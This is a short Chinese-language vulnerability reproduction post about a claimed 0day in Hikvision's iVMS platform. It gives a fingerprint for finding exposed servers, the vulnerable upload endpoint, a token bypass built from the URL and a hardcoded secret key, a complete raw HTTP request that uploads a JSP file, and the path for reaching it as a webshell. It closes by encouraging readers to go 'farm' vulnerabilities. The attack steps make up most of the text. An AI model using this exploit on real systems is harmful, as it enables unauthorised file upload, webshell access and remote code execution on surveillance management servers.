海康威视iVMS系统在野 0day漏洞复现

漏洞概述

简介：海康威视iVMS系统存在在野 0day 漏洞，攻击者通过获取密钥任意构造token，请求/resourceOperations/upload接口任意上传文件，导致获取服务器webshell权限，同时可远程进行恶意代码执行。

hunter指纹

web.icon==“3670cbb1369332b296ce44a94b7dd685”

漏洞复现

漏洞url：/eps/api/resourceOperations/upload
检测脚本PoC:https://github.com/sccmdaveli/hikvision-poc

可以看到需要token，这俩token需要用url+secretkey的md5值进行绕过

http://url/eps/api/resourceOperations/uploadsecretKeyIbuilding

进行上传

POST /eps/api/resourceOperations/upload?token=Token值 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Cookie: ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169
Content-Length: 179
Content-Type: multipart/form-data; boundary=f7d1250b2d43db9324c19e1073573ce6

–f7d1250b2d43db9324c19e1073573ce6
Content-Disposition: form-data; name=“fileUploader”; filename=“1.jsp”
Content-Type: image/jpeg

test
–f7d1250b2d43db9324c19e1073573ce6–

访问路径http://url/eps/upload/uid.jsp

然后就可以愉快的刷洞了

更为详细链接为：https://blog.csdn.net/qq_41904294/article/details/130807691